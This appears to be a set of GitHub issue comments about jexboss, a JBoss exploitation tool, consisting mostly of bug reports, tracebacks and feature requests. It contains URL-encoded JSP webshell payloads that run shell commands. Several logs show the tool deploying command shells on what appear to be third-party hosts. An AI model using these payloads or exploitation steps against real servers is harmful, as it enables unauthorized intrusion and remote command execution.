8%73%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%2C%70%2E%67%65%74%4F%75%74%70%75%74%53%74%72%65%61%6D%28%29%29%29%2E%73%74%61%72%74%28%29%3B%7D%65%6C%73%65%7B%69%66%28%6E%69%78%29%7B%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%6E%65%77%20%53%74%72%69%6E%67%5B%5D%7B%22%2F%62%69%6E%2F%62%61%73%68%22%2C%22%2D%63%22%2C%73%68%7D%29%3B%7D%65%6C%73%65%7B%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%22%63%6D%64%2E%65%78%65%20%2F%43%20%22%2B%73%68%29%3B%7D%62%72%3D%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%29%3B%53%74%72%69%6E%67%20%64%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%77%68%69%6C%65%28%64%20%21%3D%20%6E%75%6C%6C%29%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%64%29%3B%64%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%7D%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%22%55%6E%6B%6E%6F%77%6E%20%63%6F%6D%6D%61%6E%64%22%29%3B%7D%7D%25%3E&argType=boolean&arg4=True (Caused by ProtocolError('Connection aborted.', BadStatusLine("''",)))

Any clue how prevent this kind of error?

Getting following error when trying admin_console

[code]
Traceback (most recent call last):
File "./jexboss.py", line 681, in
main()
File "./jexboss.py", line 520, in main
auto_exploit(url, i)
File "./jexboss.py", line 313, in auto_exploit
result = _exploits.exploit_admin_console(url, gl_args.jboss_login)
File "/root/jexboss/_exploits.py", line 461, in exploit_admin_console
cookie = r.getheader('set-cookie').split(";")[0]
AttributeError: 'NoneType' object has no attribute 'split'
[/code]

Estou recebendo connection timed out provavelmente porque da maquina que estou executando só consigo acessar internet via proxy.
Achei que usando a opção "-D" iria evitar o erro abaixo mas recebei o mesmo erro. Esta opção não deveria evitar de fazer a chamada para http://joaomatosf.com/rnp/releases.txt?
Na verdade então essa issue é uma feature request para implementar suporte a proxy.

Traceback (most recent call last):
  File "jexboss.py", line 551, in <module>
    main()
  File "jexboss.py", line 367, in main
    updates = check_updates()
  File "E:\jexboss\_updates.py", line 107, in check_updates
    r = pool.request('GET', url, redirect=False, headers=header)
  File "E:\Python27\lib\site-packages\urllib3\request.py", line 66, in request
    **urlopen_kw)
  File "E:\Python27\lib\site-packages\urllib3\request.py", line 87, in request_encode_url
    return self.urlopen(method, url, **extra_kw)
  File "E:\Python27\lib\site-packages\urllib3\poolmanager.py", line 244, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "E:\Python27\lib\site-packages\urllib3\connectionpool.py", line 671, in urlopen
    release_conn=release_conn, **response_kw)
  File "E:\Python27\lib\site-packages\urllib3\connectionpool.py", line 671, in urlopen
    release_conn=release_conn, **response_kw)
  File "E:\Python27\lib\site-packages\urllib3\connectionpool.py", line 671, in urlopen
    release_conn=release_conn, **response_kw)
  File "E:\Python27\lib\site-packages\urllib3\connectionpool.py", line 643, in urlopen
    _stacktrace=sys.exc_info()[2])
  File "E:\Python27\lib\site-packages\urllib3\util\retry.py", line 303, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='joaomatosf.com', port=80): Max retries exceeded with url: /rnp/releases.txt (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x000000000357A518>, 'Connection to joaomatosf.com timed out. (connect timeout=3.0)'))

Is there a CVE or any writeups you can link to associated with commit 7411be3?

Got the following error:

 * Sending exploit code to [redacted]. Please wait...

 * Successfully deployed code! Starting command shell. Please wait...

 * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * 

 * [redacted]: 

Traceback (most recent call last):
  File "jexboss.py", line 544, in <module>
    main()
  File "jexboss.py", line 393, in main
    auto_exploit(url, i)
  File "jexboss.py", line 242, in auto_exploit
    shell_http(url, exploit_type)
  File "jexboss.py", line 283, in shell_http
    resp += " " + str(r.data).split(">")[1]
IndexError: list index out of range

I'm not sure if the site's IPS is the one causing the issue.

I'm executing in the correct syntax:

python jexboss.py -host https://host

I keep getting this returned:

parser.add_argument('-mode', help="Operation mode", choices={'standalone','auto-scan', 'file-scan'}, default='standalone')

What am I doing wrong? Thanks!

The commands like "cd .." or "cat > Test.txt" are not working ...

can you tell me,what you use to create jsp shellcode??
like:
jsp = ("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61%2E%75%74%69%6C%2E%2A" "%2C%6A%61%76%61%2E%69%6F%2E%2A%2C%20%6A%61%76%61%2E%6E%65%74%2E%2A%22%20%70%61%67%65%45" "%6E%63%6F%64%69%6E%67%3D%22%55%54%46%2D%38%22%25%3E%20%3C%70%72%65%3E%20%3C%25%20%69%6E" "%74%20%76%65%72%73%69%6F%6E%20%3D%20%33%3B%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65" "%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20%6E%75%6C%6C%29%20%7B%20" "%62%6F%6F%6C%65%61%6E%20%63%68%65%63%6B%55%70%64%61%74%65%73%3B%20%48%74%74%70%55%52%4C" "%43%6F%6E%6E%65%63%74%69%6F%6E%20%63%6F%6E%6E%43%68%65%63%6B%55%70%64%61%74%65%73%20%3D" "%20%6E%75%6C%6C%3B%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%62%72%20%3D%20%6E%75" "%6C%6C%3B%20%72%65%73%70%6F%6E%73%65%2E%73%65%74%43%6F%6E%74%65%6E%74%54%79%70%65%28%22" "%74%65%78%74%2F%68%74%6D%6C%22%29%3B%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65%74%48" "%65%61%64%65%72%28%22%63%68%65%63%6B%2D%75%70%64%61%74%65%73%22%29%20%21%3D%20%6E%75%6C" "%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%63%68%65%63%6B" "%2D%75%70%64%61%74%65%73%22%29%2E%65%71%75%61%6C%73%28%22%66%61%6C%73%65%22%29%29%7B%20" "%63%68%65%63%6B%55%70%64%61%74%65%73%20%3D%20%66%61%6C%73%65%3B%20%7D%65%6C%73%65%20%7B" "%20%63%68%65%63%6B%55%70%64%61%74%65%73%20%3D%20%74%72%75%65%3B%20%63%6F%6E%6E%43%68%65" "%63%6B%55%70%64%61%74%65%73%20%3D%20%28%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F" "%6E%29%20%6E%65%77%20%55%52%4C%28%22%68%74%74%70%3A%2F%2F%77%65%62%73%68%65%6C%6C%2E%6A" "%65%78%62%6F%73%73%2E%6E%65%74%2F%6A%73%70%5F%76%65%72%73%69%6F%6E%2E%74%78%74%22%29%2E" "%6F%70%65%6E%43%6F%6E%6E%65%63%74%69%6F%6E%28%29%3B%20%7D%20%53%74%72%69%6E%67%20%73%68" "%20%3D%20%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22" "%29%3B%20%53%74%72%69%6E%67%20%6C%61%73%74%48%6F%75%72%43%68%65%63%6B%20%3D%20%28%6E%65" "%77%20%44%61%74%65%28%29%2E%74%6F%53%74%72%69%6E%67%28%29%2E%73%70%6C%69%74%28%22%3A%22" "%29%5B%30%5D%2B%22%68%2E%6C%6F%67%22%29%2E%72%65%70%6C%61%63%65%41%6C%6C%28%22%20%22%2C"

Hi,

Got an error while executing other command like 'cd' or any other command.

-----------------------------------------

Unknown command
Unknown command
Failed to check for updates
Unknown command
[Type commands or "exit" to finish]
Shell> ls
Unknown command

[Type commands or "exit" to finish]
Shell> ipconfig
Failed to check for updates
Unknown command

[Type commands or "exit" to finish]
Shell>

When I use -A in file-scan mode,I got something wrong.Is -A can only use in standalone mode?

Hello
I've get this error while checking the server ::

[*] Checking Servlet Deserialization:

• An error occurred while connecting to the host @ip:80 (HTTPConnectionPool(host='jst11.azurewebsites.net', port=80): Max retries exceeded with url: / (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f2a1f585450>, 'Connection to jst11.azurewebsites.net timed out. (connect timeout=1.0)')))

[*] Checking Application Deserialization:

• An error occurred while connecting to the host @ip:80 (HTTPConnectionPool(host='jst11.azurewebsites.net', port=80): Max retries exceeded with url: / (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f2a1f585510>, 'Connection to jst11.azurewebsites.net timed out. (connect timeout=1.0)')))

I'm getting the following error when trying to use jexboss for the first time:

• An error occurred while connecting to the host https://:443None (Failed to parse: :443None)

Hello,

Is it possible to add a "-y" flag for the exploit testing>? this way the code can essessionly perform an autoscan/exploint when running a individual host base scan

I'd like to add support for the detection of this vulnerability, would you be interested if I submitted a pull request for this?

Hi, I want to add your tool into ArchStrike. Would it be possible to add a license file?

Hi friend,
I noticed that you provided a --load-gadget flag,is this means I can use ysoserial to generate payload?Can you tell me how did you generate the build-in payloads?
thaks!

Hi João,
is there anyway to call a real tty, or just making reverse connection ?
thanks!

@Version: 1.2.4

• Checking for updates in: http://joaomatosf.com/rnp/releases.txt **

** Checking Host: google.com **

[*] Checking JMX Tomcat:

• An error occurred while connecting to the host google.com (list index out of range)

• Results:
  The server is not vulnerable to bugs tested ... :D

OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 state=error: dh key too small

Hi thanks for the awesome tool but i want to ask how can we use our own payload with --load-gadget ? Or can you please add ysoserial payload generate tool to automate ? I see you added some of them but not all. Sorry for bad english. Thank you for attention. Regards.

when using standalone mode and -A with a target whose admin-console is vulnerable,I got this:
pydev_imports.execfile(file, globals, locals) # execute the script
File "F:/Dev/Python_Projects/gsz/jexboss.py", line 1016, in
main()
File "F:/Dev/Python_Projects/gsz/jexboss.py", line 885, in main
auto_exploit(url, vector)
File "F:/Dev/Python_Projects/gsz/jexboss.py", line 548, in auto_exploit
result = _exploits.exploit_admin_console(url, gl_args.jboss_login)
File "F:/Dev/Python_Projects/gsz_exploits.py", line 825, in exploit_admin_console
cookie = rheader.split(";")[0]
AttributeError: 'NoneType' object has no attribute 'split'

the line message maybe wrong because I have modifid this version.
it may cause by response "set-cookie" is null,because username/password is wrong

PoC here

https://github.com/jas502n/St2-057/blob/master/README.md

hello,

i was wondering is there a patch already that fixes these vulnerabilties or can this script be executed on all jboss versions :D

thanks.

Hi,

Firstly, thanks for the great tool!

I'm not aware of any way to resume a session with an already exploited server (on which the webshell is already deployed), have I missed something?

If not I think it can be an interesting feature to implement.

Thanks!

Not sure it it is a bug or a feature, but if you try to exploit a vulnerability in a Windows target the Shell doesn't work. All the vulnerabilities are correctly identified though.

running Python 2.7, the following line returns a r.status of 200
https://github.com/joaomatosf/jexboss/blob/master/jexboss.py#L120

in certain cases, hosts listening on port 80 do not handle the HEAD request nicely and return a garbage response. It looks like Python 2 is doing this, while Python 3 will see the correct response and generate an exception

In 2.7:

>>> r = pool.request('HEAD', url +str(paths['admin-console']), redirect=False, headers=headers)
>>> r.status
200

In 3.4:

>>> r = pool.request('HEAD', url +str(paths['admin-console']), redirect=False, headers=headers)
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 331, in _make_request
    httplib_response = conn.getresponse(buffering=True)
TypeError: getresponse() got an unexpected keyword argument 'buffering'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 516, in urlopen
    body=body, headers=headers)
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 333, in _make_request
    httplib_response = conn.getresponse()
  File "/usr/lib/python3.4/http/client.py", line 1171, in getresponse
    response.begin()
  File "/usr/lib/python3.4/http/client.py", line 351, in begin
    version, status, reason = self._read_status()
  File "/usr/lib/python3.4/http/client.py", line 333, in _read_status
    raise BadStatusLine(line)
http.client.BadStatusLine:  Ú¬LIP�=¶<��Þ�brĸ�¢nÆGÕc¡»�6Fh¶ñ?àTáÿ»�¾îr»0á�÷<}�Ù6¯�õ¢+àÑÎgìmºc¸ÉfDåÒ��Áþ×�]êÓh¹��ôÕ

I get the following error, even though says successful. Screen dump below. @Version: 1.0.10

• Do you want to try to run an automated exploitation via "jmx-console" ?
  This operation will provide a simple command shell to execute commands on the server..
  Continue only if you have permission!
  yes/NO ? yes
  • Sending exploit code to x.x.x.x:8080. Please wait...
  • Successfully deployed code! Starting command shell. Please wait...
  • • - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - *

Traceback (most recent call last):
File "jexboss.py", line 523, in
main()
File "jexboss.py", line 372, in main
auto_exploit(url, i)
File "jexboss.py", line 221, in auto_exploit
shell_http(url, exploit_type)
File "jexboss.py", line 261, in shell_http
r = pool.request('GET', url + path + cmd, redirect=False, headers=headers)
File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 68, in request
*_urlopen_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 81, in request_encode_url
return self.urlopen(method, url, *_urlopen_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 161, in urlopen
response = conn.urlopen(method, u.request_uri, *_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 617, in urlopen
release_conn=release_conn, *_response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 617, in urlopen
release_conn=release_conn, *_response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 617, in urlopen
release_conn=release_conn, *_response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 597, in urlopen
_stacktrace=sys.exc_info()[2])
File "/usr/lib/python2.7/dist-packages/urllib3/util/retry.py", line 271, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='x.x.x.x', port=8080): Max retries exceeded with url: /jexws3/jexws3.jsp?ppp=id (Caused by ReadTimeoutError("HTTPConnectionPool(host='x.x.x.x', port=8080): Read timed out. (read timeout=6.0)",))

I'm getting the following SSL issue. Any way to fix this?

 [*] Checking JMXInvokerServlet:
 *** An error occurred while connecting to the host https://example.com/ ([SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:661))**

** Checking Host: http://www.frauen-ficken.webcam-sex-chat.net **

• Checking admin-console: [ EXPOSED ]
• Checking web-console: [ VULNERABLE ]
• Checking jmx-console: [ VULNERABLE ]
• Checking JMXInvokerServlet: [ VULNERABLE ]
• Do you want to try to run an automated exploitation via "jmx-console" ?
  This operation will provide a simple command shell to execute commands on the server..
  Continue only if you have permission!
  yes/NO ? yes
• Sending exploit code to http://www.frauen-ficken.webcam-sex-chat.net. Please wait...
• Successfully deployed code! Starting command shell. Please wait...
• • - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - *
• http://www.frauen-ficken.webcam-sex-chat.net:

Traceback (most recent call last):
File "jexboss.py", line 523, in
main()
File "jexboss.py", line 372, in main
auto_exploit(url, i)
File "jexboss.py", line 221, in auto_exploit
shell_http(url, exploit_type)
File "jexboss.py", line 262, in shell_http
resp += " " + str(r.data).split(">")[1]
IndexError: list index out of range

** Checking Host: http://188.165.0.15 **

• Checking admin-console: [ EXPOSED ]
• Checking web-console: [ VULNERABLE ]
• Checking jmx-console: [ VULNERABLE ]
• Checking JMXInvokerServlet: [ VULNERABLE ]
• Do you want to try to run an automated exploitation via "jmx-console" ?
  This operation will provide a simple command shell to execute commands on the server..
  Continue only if you have permission!
  yes/NO ? yes
• Sending exploit code to http://188.165.0.15. Please wait...
• Successfully deployed code! Starting command shell. Please wait...
• • - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - *
• http://188.165.0.15:

Traceback (most recent call last):
File "jexboss.py", line 523, in
main()
File "jexboss.py", line 372, in main
auto_exploit(url, i)
File "jexboss.py", line 221, in auto_exploit
shell_http(url, exploit_type)
File "jexboss.py", line 262, in shell_http
resp += " " + str(r.data).split(">")[1]
IndexError: list index out of range

Could not get command output. You need to set up an Authoritative DNS and try to get the
output of the commands via DNS covert channel.